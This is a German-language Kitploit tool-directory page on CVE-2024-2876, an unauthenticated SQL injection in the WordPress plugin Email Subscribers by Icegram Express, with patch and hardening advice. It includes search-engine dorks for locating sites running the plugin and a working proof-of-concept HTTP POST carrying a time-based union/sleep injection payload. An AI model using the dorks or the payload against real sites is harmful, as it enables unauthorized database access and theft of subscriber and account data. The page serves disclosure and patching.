Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-2876 | Kitploit
Tools/GitHubGitHub/kernel364/cve-2024-2876
AufklärungSchwachstellenanalyseExploitationWebanwendungs-Exploitation
GitHubkernel364/cve-2024-2876

CVE-2024-2876

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-2876 - SQL-Injection-Schwachstelle in Email Subscribers von Icegram Express

Übersicht

CVE-2024-2876 ist eine kritische Sicherheitsschwachstelle, die im Plugin „Email Subscribers by Icegram Express" für WordPress gefunden wurde. Diese Schwachstelle betrifft Versionen bis einschließlich 5.7.14 und stellt ein erhebliches Risiko für über 90.000 Websites dar.

Details zur Schwachstelle

  • CVE-ID: CVE-2024-2876
  • CVSS-Score: 9.8 (Kritisch)
  • Betroffene Versionen: Bis 5.7.14
  • Behobene Version: 5.7.15 und höher

Beschreibung

Bei der Schwachstelle handelt es sich um einen SQL-Injection-Fehler, der es nicht authentifizierten Angreifern ermöglicht, bösartige SQL-Abfragen auf den betroffenen WordPress-Datenbanken auszuführen. Durch die Manipulation von Benutzereingaben, die nicht ordnungsgemäß bereinigt werden, können Angreifer vertrauliche Informationen wie Benutzernamen, E-Mail-Adressen, Passwort-Hashes und Abonnentenlisten extrahieren.

Exploit-Mechanismus

Die SQL-Injection tritt innerhalb der run-Funktion der IG_ES_Subscribers_Query-Klasse des Plugins auf, wo eine unzureichende Eingabevalidierung zur unbefugten Ausführung von SQL-Code führt. Dies gefährdet die Integrität und Vertraulichkeit der in der WordPress-Datenbank gespeicherten Daten.

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

PoC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Empfehlungen

  1. Sofortiges Update: Wenn Sie das Plugin „Email Subscribers by Icegram Express" verwenden, aktualisieren Sie es sofort auf Version 5.7.15 oder höher, um den Sicherheitsfix anzuwenden.

  2. Regelmäßige Audits: Überprüfen und aktualisieren Sie regelmäßig alle WordPress-Plugins und -Themes auf ihre neuesten Versionen, um die Sicherheit zu gewährleisten.

  3. Sicherheits-Plugins: Verwenden Sie seriöse WordPress-Sicherheits-Plugins, um die Abwehr gegen SQL-Injection und andere Cyber-Bedrohungen zu verbessern.

  4. Starke Passwortrichtlinien: Implementieren Sie starke und einzigartige Passwörter für alle Konten, die mit Ihrer WordPress-Website verbunden sind, um das Risiko unbefugten Zugriffs zu verringern.

Auswirkungen bei Nichtbehebung

Wenn das betroffene Plugin nicht aktualisiert wird, bleiben Websites anfällig für Datenlecks und unbefugten Zugriff. Angesichts der weiten Verbreitung dieses Plugins ist sofortiges Handeln entscheidend, um Installationen zu sichern.

Tool herunterladen